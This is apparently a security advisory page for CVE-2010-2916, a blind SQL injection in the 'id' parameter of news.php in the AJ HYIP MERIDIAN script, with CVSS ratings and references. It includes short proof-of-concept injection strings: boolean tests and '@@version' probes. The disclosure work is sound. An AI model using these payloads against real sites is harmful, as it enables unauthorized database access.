AJ HYIP MERIDIAN (news.php id) Blind SQL Injection Vulnerability

2010-08-02 / 2010-08-03
Credit: Jose Luis Gongora Fernandez
Risk: High
Local: No
Remote: Yes
CVE: CVE-2010-2916
CWE: CWE-89


Ogólna skala CVSS: 7.5/10
Znaczenie: 6.4/10
Łatwość wykorzystania: 10/10
Wymagany dostęp: Zdalny
Złożoność ataku: Niska
Autoryzacja: Nie wymagana
Wpływ na poufność: Częściowy
Wpływ na integralność: Częściowy
Wpływ na dostępność: Częściowy

AJ HYIP MERIDIAN (news.php id) Blind SQL Injection Vulnerability bug found by Jose Luis Gongora Fernandez (a.k.a) JosS contact: sys-project[at]hotmail.com website: http://www.hack0wn.com/ - site: http://www.ajsquare.com/products/ajhyip/index.php - about AJ HYIP: AJ HYIP is a complete financial tool with no technical knowledge required to manage the site. AJ HYIP software is the latest and most advanced HYIP Script with excellent navigation features. Our HYIP Script can be easily customized to accustom your needs with a potential to generate heavy revenues. ~ [POC] http://target/path/news.php?id=1 [bSQL] http://target/path/news.php?id=1 and 1=1 http://target/path/news.php?id=1 and 1=2 ~ [DEMO] http://server/meridian/news.php?id=1 and substring(@@version,1,1)=4 http://server/meridian/news.php?id=1 and substring(@@version,1,1)=5 __h0__

Referencje:

http://xforce.iss.net/xforce/xfdb/60590
http://www.exploit-db.com/exploits/14436
http://packetstormsecurity.org/1007-exploits/ajhyipmeridian-sql.txt


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top